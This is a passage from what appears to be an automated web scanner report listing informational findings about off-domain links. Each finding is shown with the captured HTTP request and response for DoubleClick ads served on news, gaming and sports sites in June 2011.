Zek5uVVZGNVQyZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmllRVpDV1Y5TU1WUmtla3BQVFhvNGJGRm1TbTFoU0hoRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNlkwTmxkMmhzU25sUGNsZzJOMGxMYVhWUVJGSlJjRFZOV1ZobkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=1314067228?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2589194/1-EXP_11076_Banner728x90_060111_r2.1.gif

Request

GET /adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUFng8aJLBZKJyWoaUyNqjOVxerAdnZW8sdXNhLHQsMTMwNzk2NDAxMjgxMCxjLDM0NTc2OCxwYyw3NzQ4MyxhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk1LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVjdWFkUTg1dE1FcUMuTVg2ZXFWMTU3Y1F2SkpuWlc4c2RYTmhMSFFzTVRNd056azJOREF3T0RFM01TeGpMRE0wTmpRMk55eHdZeXczT1Rjd01DeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVDFRNVQxWjNVRnB3YTB4ZllYbEVSMjkyUW1SNU9XczRkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RsQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZaM2QwSkJaMVZEUVZGUlFVRkJRVUZQVW04eVlVRkJRVUZCUVM0dlkyNWtQU0ZpZDFoTVRGRnFZek5uVVZGNVQyZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmllRVpDV1Y5TU1WUmtla3BQVFhvNGJGRm1TbTFoU0hoRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNlkwTmxkMmhzU25sUGNsZzJOMGxMYVhWUVJGSlJjRFZOV1ZobkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=1314067228? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003240&bpp=7&shv=r20110608&jsv=r20110607&correlator=1307964003248&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1065&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=1&dtd=21&xpc=5g2L9BvBMy&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 2019
Date: Mon, 13 Jun 2011 11:20:14 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/4/64f/%2a/k;241004352;1-0;0;62740535;3454-728/90;42550474/42568261/1;;~sscs=%3fhttp://ad.amgdgt.com/ads/t=c/s=AAAAAQA
...[SNIP]...
Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign"><img src="http://s0.2mdn.net/viewad/2589194/1-EXP_11076_Banner728x90_060111_r2.1.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

18.41. http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.tim/entertainment/blogs/tuned_in

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in;aid=15917;sz=115x42;path=2011;path=06;path=13;path=game-of-thrones-watch-its-all-in-the-execution-2;dcove=d;cmpos=homepage;cmtyp=tout;pgurl=1;tile=9;ord=480302067475?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1447902/CM_Time-subscribe199-115x42.gif

Request

GET /adj/cm.tim/entertainment/blogs/tuned_in;aid=15917;sz=115x42;path=2011;path=06;path=13;path=game-of-thrones-watch-its-all-in-the-execution-2;dcove=d;cmpos=homepage;cmtyp=tout;pgurl=1;tile=9;ord=480302067475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 531
Date: Mon, 13 Jun 2011 11:19:01 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/g;206790837;0-0;1;30172038;29108-115/42;34627698/34645576/1;;~okv=;aid=15917;sz=115x42;path=2011;path=06;path
...[SNIP]...
13;path=game-of-thrones-watch-its-all-in-the-execution-2;dcove=d;cmpos=homepage;cmtyp=tout;pgurl=1;~aopt=2/1/57/0;~sscs=%3fhttps://subscription.time.com/storefront/subscribe-to-time/link/1002501.html"><img src="http://s0.2mdn.net/viewad/1447902/CM_Time-subscribe199-115x42.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.42. http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.tim/entertainment/blogs/tuned_in

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in;aid=15917;sz=300x100;path=2011;path=06;path=13;path=game-of-thrones-watch-its-all-in-the-execution-2;dcove=d;cmpos=article;cmtyp=tout;pgurl=1;tile=7;ord=480302067475?

The response contains the following link to another domain:

http://subscription-assets.time.com/prod/assets/themes/magazines/SUBS/templates/velocity/site/td-300x100bluepartofie/continue-ofie.html?dfpPost='+escape(ticmAdUnits[ticmAdUnits.length-1][0])+'&dfpGet='+escape(ticmAdUnits[ticmAdUnits.length-1][1])+'&channel='+escape(ticmAdUnits[ticmAdUnits.length-1][2])+'

Request

GET /adj/cm.tim/entertainment/blogs/tuned_in;aid=15917;sz=300x100;path=2011;path=06;path=13;path=game-of-thrones-watch-its-all-in-the-execution-2;dcove=d;cmpos=article;cmtyp=tout;pgurl=1;tile=7;ord=480302067475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1351
Date: Mon, 13 Jun 2011 11:18:54 GMT

document.write('');

if(typeof ticmAdUnits == "undefined"){var ticmAdUnits = [];}
ticmAdUnits[ticmAdUnits.length] = ["http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/3/0/%2a/n%3B207666804%3B0-0%3B1%3B30
...[SNIP]...
Bpath%3Dgame-of-thrones-watch-its-all-in-the-execution-2%3Bdcove%3Dd%3Bcmpos%3Darticle%3Bcmtyp%3Dtout%3Bpgurl%3D1%3B%7Eaopt%3D2/1/57/0%3B%7Esscs%3D%3f","dflt"];

document.write('\n');

document.write('<iframe src="http://subscription-assets.time.com/prod/assets/themes/magazines/SUBS/templates/velocity/site/td-300x100bluepartofie/continue-ofie.html?dfpPost='+escape(ticmAdUnits[ticmAdUnits.length-1][0])+'&dfpGet='+escape(ticmAdUnits[ticmAdUnits.length-1][1])+'&channel='+escape(ticmAdUnits[ticmAdUnits.length-1][2])+'" style="width:300px;height:100px;border:none;margin:0px;" scrolling="no" frameborder="0" ></iframe>
...[SNIP]...

18.43. http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.tim/entertainment/blogs/tuned_in

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in;aid=15917;sz=300x250;path=2011;path=06;path=13;path=game-of-thrones-watch-its-all-in-the-execution-2;dcove=d;cmpos=global;cmtyp=tout;pgurl=1;tile=6;ord=480302067475?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1447900/video_300x250_static.jpg

Request

GET /adj/cm.tim/entertainment/blogs/tuned_in;aid=15917;sz=300x250;path=2011;path=06;path=13;path=game-of-thrones-watch-its-all-in-the-execution-2;dcove=d;cmpos=global;cmtyp=tout;pgurl=1;tile=6;ord=480302067475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 478
Date: Mon, 13 Jun 2011 11:18:52 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/z;207300499;8-0;0;30172038;4307-300/250;34185537/34203415/1;;~okv=;aid=15917;sz=300x250;path=2011;path=06;path=13;path=game-of-thrones-watch-its-all-in-the-execution-2;dcove=d;cmpos=global;cmtyp=tout;pgurl=1;~aopt=2/1/57/0;~sscs=%3fhttp://www.time.com/time/video/"><img src="http://s0.2mdn.net/viewad/1447900/video_300x250_static.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.44. http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.tim/entertainment/blogs/tuned_in

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/cm.tim/entertainment/blogs/tuned_in;aid=15917;sz=300x15;path=2011;path=06;path=13;path=game-of-thrones-watch-its-all-in-the-execution-2;dcove=d;cmpos=global;cmtyp=tout;pgurl=1;tile=5;ord=480302067475?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1447902/CM_TD_300x15_6for199.gif

Request

GET /adj/cm.tim/entertainment/blogs/tuned_in;aid=15917;sz=300x15;path=2011;path=06;path=13;path=game-of-thrones-watch-its-all-in-the-execution-2;dcove=d;cmpos=global;cmtyp=tout;pgurl=1;tile=5;ord=480302067475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 521
Date: Mon, 13 Jun 2011 11:24:08 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/b;207548109;0-0;2;30172038;2731-300/15;35070120/35087950/1;;~okv=;aid=15917;sz=300x15;path=2011;path=06;path=13;path=game-of-thrones-watch-its-all-in-the-execution-2;dcove=d;cmpos=global;cmtyp=tout;pgurl=1;~aopt=2/0/57/0;~sscs=%3fhttps://subscription.time.com/storefront/subscribe-to-time/link/1002507.html"><img src="http://s0.2mdn.net/viewad/1447902/CM_TD_300x15_6for199.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.45. http://ad.doubleclick.net/adj/fansided.fsv/ros previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fansided.fsv/ros

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/fansided.fsv/ros;sect=ros;fantasy=no;game=no;tile=3;sz=300x250;ord=8325885576?

The response contains the following link to another domain:

http://core.videoegg.com/eap/html/js/init.js?"+Math.random()+"

Request

GET /adj/fansided.fsv/ros;sect=ros;fantasy=no;game=no;tile=3;sz=300x250;ord=8325885576? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 465
Date: Mon, 13 Jun 2011 11:13:33 GMT

document.write('');

var ve_publisher = "FantasySportsVentures";
var ve_site = "FSV_300X250";
var ve_area = "FSV_300X250";
var ve_location = "FSV_300X250_ROS_300X250";
var ve_placement = "ROS";
var ve_width = 300;
var ve_height = 250;
var ve_alternate = "http://ads.sixapart.com/custom?id=say.fantasysportsventure/sports.ros/300x250";
document.write("<script src='http://core.videoegg.com/eap/html/js/init.js?"+Math.random()+"'></sc"+"ript>
...[SNIP]...

18.46. http://ad.doubleclick.net/adj/gm.kotaku/e3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/gm.kotaku/e3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/gm.kotaku/e3;ptile=5;sz=82x50;ord=71293824;mtfIFPath=/assets/vendor/doubleclick/?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/1289736/e3_82x50.JPG

Request

GET /adj/gm.kotaku/e3;ptile=5;sz=82x50;ord=71293824;mtfIFPath=/assets/vendor/doubleclick/? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 371
Date: Mon, 13 Jun 2011 11:18:39 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/w;242186853;0-0;0;35427945;8058-82/50;42527333/42545120/1;;~okv=;ptile=5;sz=82x50;mtfIFPath=/assets/vendor/doubleclick/;~aopt=2/1/23/0;~sscs=%3fhttp://kotaku.com/e32011"><img src="http://s0.2mdn.net/viewad/1289736/e3_82x50.JPG" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.47. http://ad.doubleclick.net/adj/gm.kotaku/pax previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/gm.kotaku/pax

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/gm.kotaku/pax;ptile=2;sz=82x50;ord=15641756;mtfIFPath=/assets/vendor/doubleclick/?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/gm.kotaku/pax;ptile=2;sz=82x50;ord=15641756;mtfIFPath=/assets/vendor/doubleclick/? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 321
Date: Mon, 13 Jun 2011 11:23:20 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/b;44306;0-0;0;46577859;8058-82/50;0/0/0;;~okv=;ptile=2;sz=82x50;mtfIFPath=/assets/vendor/doubleclick/;~aopt=2/0/23/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.48. http://ad.doubleclick.net/adj/gm.kotaku/threeDS previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/gm.kotaku/threeDS

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/gm.kotaku/threeDS;ptile=3;sz=82x50;ord=35629641;mtfIFPath=/assets/vendor/doubleclick/?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/gm.kotaku/threeDS;ptile=3;sz=82x50;ord=35629641;mtfIFPath=/assets/vendor/doubleclick/? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://kotaku.com/5811225/a-game-of-thrones-isnt-a-game-at-all-without-sean-bean
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 321
Date: Mon, 13 Jun 2011 11:18:34 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/r;44306;0-0;0;63595891;8058-82/50;0/0/0;;~okv=;ptile=3;sz=82x50;mtfIFPath=/assets/vendor/doubleclick/;~aopt=2/1/23/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.49. http://ad.doubleclick.net/adj/imdb2.consumer.title/maindetails previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/imdb2.consumer.title/maindetails

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/imdb2.consumer.title/maindetails;tile=4;sz=728x90,1008x150,1008x200,1008x30,9x1;p=t;p=top;ct=com;k=p;g=dr;id=tt0944947;tt=tv;coo=usa;g=f;b=t25;;u=4726988386828452;ord=4726988386828452?

The response contains the following link to another domain:

http://ia.media-imdb.com/media/imdb/01/I/01/02/15/10.gif

Request

GET /adj/imdb2.consumer.title/maindetails;tile=4;sz=728x90,1008x150,1008x200,1008x30,9x1;p=t;p=top;ct=com;k=p;g=dr;id=tt0944947;tt=tv;coo=usa;g=f;b=t25;;u=4726988386828452;ord=4726988386828452? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6092
Date: Mon, 13 Jun 2011 11:24:17 GMT

document.write('<!-- emulator keys : mode=form&wt=1008&ht=150&fp=true&fb=%23000000&cc1=assets%20swf&u=http%3A%2F%2Fwww.hbogo.com%2F&url=%2F&fs=http%3A%2F%2Fia.media-imdb.com%2Fimages%2FM%2FMV5BMTU5NjU
...[SNIP]...
<a href="'+clickThru+'" target="_blank"><img src="http://ia.media-imdb.com/media/imdb/01/I/01/02/15/10.gif" width="1020" height="150" usemap="#imageMap" border="0"></a>
...[SNIP]...

18.50. http://ad.doubleclick.net/adj/imdb2.consumer.title/maindetails previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/imdb2.consumer.title/maindetails

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/imdb2.consumer.title/maindetails;tile=2;sz=300x250;p=br;ct=com;k=p;g=dr;id=tt0944947;tt=tv;coo=usa;g=f;b=t25;;u=4726988386828452;ord=4726988386828452?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/817-grey.gif

Request

GET /adj/imdb2.consumer.title/maindetails;tile=2;sz=300x250;p=br;ct=com;k=p;g=dr;id=tt0944947;tt=tv;coo=usa;g=f;b=t25;;u=4726988386828452;ord=4726988386828452? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 263
Date: Mon, 13 Jun 2011 11:19:00 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/o;44306;0-0;0;32554139;4307-300/250;0/0/0;u=4726988386828452;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

18.51. http://ad.doubleclick.net/adj/mavericks.dart/homepage_bottom_left_728x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/mavericks.dart/homepage_bottom_left_728x90

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/mavericks.dart/homepage_bottom_left_728x90;sz=728x90;ord=[timestamp]?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/541109/UTSW-1155_Best_Hospital_728x90px_2.JPG

Request

GET /adj/mavericks.dart/homepage_bottom_left_728x90;sz=728x90;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nba.com/mavericks/index_main.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 324
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:20:11 GMT
Expires: Mon, 13 Jun 2011 11:25:11 GMT

document.write('<a target="_new" href="http://ad.doubleclick.net/click;h=v8/3b25/0/0/%2a/k;241078750;0-0;0;47541785;3454-728/90;42107443/42125230/1;;~sscs=%3fhttp://www.utsouthwestern.org"><img src="http://s0.2mdn.net/viewad/541109/UTSW-1155_Best_Hospital_728x90px_2.JPG" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

